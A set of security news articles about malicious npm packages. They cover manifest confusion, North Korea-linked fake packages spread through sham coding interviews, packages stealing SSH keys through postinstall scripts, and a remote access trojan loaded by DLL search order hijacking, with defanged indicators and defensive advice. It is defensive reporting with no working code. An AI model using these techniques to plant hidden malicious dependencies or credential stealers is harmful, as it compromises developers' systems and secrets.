Mar 21, 2024NewsroomSoftware Security / Open Source

New research has discovered over 800 packages in the npm registry which have discrepancies from their registry entries, out of which 18 have been found to exploit a technique called manifest confusion.

The findings come from cybersecurity firm JFrog, which said the issue could be exploited by threat actors to trick developers into running malicious code.

“It’s an actual threat since developers may be tricked into downloading packages that look innocent, but whose hidden dependencies are actually malicious,” security researcher Andrey Polkovnichenko told The Hacker News.

Manifest confusion was first documented in July 2023, when security researcher Darcy Clarke found that mismatches in manifest and package metadata could be weaponized to stage software supply chain attacks.

The problem stems from the fact that the npm registry does not validate whether the manifest file contained in the tarball (package.json) matches the manifest data provided to the npm server during the publishing process via an HTTP PUT request to the package URI endpoint.

As a result, a threat actor could take advantage of this lack of cross verification to supply a different manifest containing hidden dependencies that’s processed during package installation to stealthily install malicious dependencies onto the developer’s system.

“The visible, or ‘fake,’ manifest can mislead developers and even audit tools that rely on the data available in the npm registry database,” JFrog said. “In reality, the installer takes the file package.json from the tarball, which may be different from the visible one supplied in the HTTP PUT request.”

The company said it identified more than 800 packages where there was a mismatch between the manifest in the npm registry and the package.json file inside the tarball.

While many of these mismatches are the result of protocol specification differences or variations in the scripts section of the package file, 18 of them are said to have been designed to exploit manifest confusion.

A notable package in question is yatai-web-ui, which is designed to send an HTTP request to a server with information about the IP address of the machine in which the package was installed.

The findings show that the attack vector seems to have never been put to use by threat actors. That said, it’s crucial that developers take steps to ensure the packages are free of suspicious behaviors.

“Since this issue was not resolved by npm, trusting packages only by how they look on npm’s website, might be risky,” Polkovnichenko said.

“Organizations should introduce procedures that verify that all packages that enter the organization or are used by their dev teams are safe and can be trusted. Specifically in the case of manifest confusion, it’s required that every package is analyzed to see if there are any hidden dependencies.”

Feb 26, 2024The Hacker NewsSoftware Security / Cryptocurrency

A set of fake npm packages discovered on the Node.js repository has been found to share ties with North Korean state-sponsored actors, new findings from Phylum show.

The packages are named execution-time-async, data-time-utils, login-time-utils, mongodb-connection-utils, and mongodb-execution-utils.

One of the packages in question, execution-time-async, masquerades as its legitimate counterpart execution-time, a library with more than 27,000 weekly downloads. Execution-time is a Node.js utility used to measure execution time in code.

It “actually installs several malicious scripts including a cryptocurrency and credential stealer,” Phylum said, describing the campaign as a software supply chain attack targeting software developers. The package was downloaded 302 times since February 4, 2024, before being taken down.

In an interesting twist, the threat actors made efforts to conceal the obfuscated malicious code in a test file, which is designed to fetch next-stage payloads from a remote server, steal credentials from web browsers like Brave, Google Chrome, and Opera, and retrieve a Python script, which, in turn, downloads other scripts –

• ~/.n2/pay, which can run arbitrary commands, download and launch ~/.n2/bow and ~/.n2/adc, terminate Brave and Google Chrome, and even delete itself
• ~/.n2/bow, which is a Python-based browser password stealer
• ~/.n2/adc, which installs AnyDesk on Windows

Phylum said it identified comments in the source code (“/Users/ninoacuna/”) that made it possible to track down a now-deleted GitHub profile with the same name (“Nino Acuna” or binaryExDev) containing a repository called File-Uploader.

Present within the repository were Python scripts referencing the same IP addresses (162.218.114[.]83 – subsequently changed to 45.61.169[.]99) used to fetch the aforementioned Python scripts.

It’s suspected that the attack is a work in progress, as at least four more packages with identical features have made their way to the npm package repository, attracting a total of 325 downloads –

Connections to North Korean Actors Emerge

Phylum, which also analyzed the two GitHub accounts that binaryExDev follows, uncovered another repository known as mave-finance-org/auth-playground, which has been forked no less than a dozen times by other accounts.

While forking a repository in itself isn’t unusual, an unusual aspect of some of these forked repositories were that they were renamed as “auth-demo” or “auth-challenge,” raising the possibility that the original repository may have been shared as part of a coding test for a job interview.

The repository was later moved to banus-finance-org/auth-sandbox, Dexbanus-org/live-coding-sandbox, and mave-finance/next-assessment, indicating attempts to actively get around GitHub’s takedown attempts. All these accounts have been removed.

What’s more, the next-assessment package was found to contain a dependency “json-mock-config-server” that’s not listed on the npm registry, but rather served directly from the domain npm.mave[.]finance.

It’s worth noting that Banus claims to be a decentralized perpetual spot exchange based in Hong Kong, with the company even posting a job opportunity for a senior frontend developer on February 21, 2024. It’s currently not clear if this is a genuine job opening or if it’s an elaborate social engineering scheme.

The connections to North Korean threat actors come from the fact that the obfuscated JavaScript embedded in the npm package overlaps with another JavaScript-based malware dubbed BeaverTail that’s propagated via npm packages. The campaign was codenamed Contagious Interview by Palo Alto Networks Unit 42 in November 2023.

Contagious Interview is a little different from Operation Dream Job – which is linked to the Lazarus Group – in that it’s mainly focused on targeting developers through fake identities in freelance job portals to trick them into installing rogue npm packages, Michael Sikorski, vice president and CTO of Palo Alto Networks Unit 42, told The Hacker News at the time.

One of the developers who fell victim to the campaign has since confirmed to Phylum that the repository is shared under the guise of a live coding interview, although they said they never installed it on their system.

“More than ever, it is important for both individual developers as well as software development organizations to remain vigilant against these attacks in open-source code,” the company said.

Jan 23, 2024NewsroomSoftware Security / Supply Chain

Two malicious packages discovered on the npm package registry have been found to leverage GitHub to store Base64-encrypted SSH keys stolen from developer systems on which they were installed.

The modules named warbeast2000 and kodiak2k were published at the start of the month, attracting 412 and 1,281 downloads before they were taken down by the npm maintainers. The most recent downloads occurred on January 21, 2024.

Software supply chain security firm ReversingLabs, which made the discovery, said there were eight different versions of warbeast2000 and more than 30 versions of kodiak2k.

Both the modules are designed to run a postinstall script after installation, which is designed to retrieve and execute two different JavaScript files.

While warbeast2000 attempts to access the private SSH key, kodiak2k is designed to look for a key named “meow,” raising the possibility that the threat actor likely used a placeholder name during the early stages of the development.

“This second stage malicious script reads the private SSH key stored in the id_rsa file located in the <homedir>/.ssh directory,” security researcher Lucija Valentić said. “It then uploaded the Base64-encoded key to an attacker-controlled GitHub repository.”

Subsequent versions of kodiak2k were found to execute a script found in an archived GitHub project hosting the Empire post-exploitation framework. The script is capable of launching the Mimikatz hacking tool to dump credentials from process memory.

“The campaign is just the latest example of cybercriminals and malicious actors using open source package managers and related infrastructure to support malicious software supply chain campaigns that target development organizations and end-user organizations,” Valentić said.

Jan 19, 2024NewsroomSoftware Security / Spyware

A malicious package uploaded to the npm registry has been found deploying a sophisticated remote access trojan on compromised Windows machines.

The package, named “oscompatible,” was published on January 9, 2024, attracting a total of 380 downloads before it was taken down.

oscompatible included a “few strange binaries,” according to software supply chain security firm Phylum, including a single executable file, a dynamic-link library (DLL) and an encrypted DAT file, alongside a JavaScript file.

This JavaScript file (“index.js”) executes an “autorun.bat” batch script but only after running a compatibility check to determine if the target machine runs on Microsoft Windows.

If the platform is not Windows, it displays an error message to the user, stating the script is running on Linux or an unrecognized operating system, urging them to run it on “Windows Server OS.”

The batch script, for its part, verifies if it has admin privileges, and if not, runs a legitimate Microsoft Edge component called “cookie_exporter.exe” via a PowerShell command.

Attempting to run the binary will trigger a User Account Control (UAC) prompt asking the target to execute it with administrator credentials.

In doing so, the threat actor carries out the next stage of the attack by running the DLL (“msedge.dll”) by taking advantage of a technique called DLL search order hijacking.

The trojanized version of the library is designed to decrypt the DAT file (“msedge.dat”) and launch another DLL called “msedgedat.dll,” which, in turn, establishes connections with an actor-controlled domain named “kdark1[.]com” to retrieve a ZIP archive.

The ZIP file comes fitted with the AnyDesk remote desktop software as well as a remote access trojan (“verify.dll”) that’s capable of fetching instructions from a command-and-control (C2) server via WebSockets and gathering sensitive information from the host.

It also “installs Chrome extensions to Secure Preferences, configures AnyDesk, hides the screen, and disables shutting down Windows, [and] captures keyboard and mouse events,” Phylum said.

While “oscompatible” appears to be the only npm module employed as part of the campaign, the development is once again a sign that threat actors are increasingly targeting open-source software (OSS) ecosystems for supply chain attacks.

“From the binary side, the process of decrypting data, using a revoked certificate for signing, pulling other files from remote sources, and attempting to disguise itself as a standard Windows update process all along the way is relatively sophisticated compared to what we normally see in OSS ecosystems,” the company said.

The disclosure comes as cloud security firm Aqua revealed that 21.2% of the top 50,000 most downloaded npm packages are deprecated, exposing users to security risks. In other words, the deprecated packages are downloaded an estimated 2.1 billion times weekly.

This includes archived and deleted GitHub repositories associated with the packages as well as those that are maintained without a visible repository, commit history, and issue tracking.

“This situation becomes critical when maintainers, instead of addressing security flaws with patches or CVE assignments, opt to deprecate affected packages,” security researchers Ilay Goldman and Yakir Kadkoda said.

“What makes this particularly concerning is that, at times, these maintainers do not officially mark the package as deprecated on npm, leaving a security gap for users who may remain unaware of potential threats.”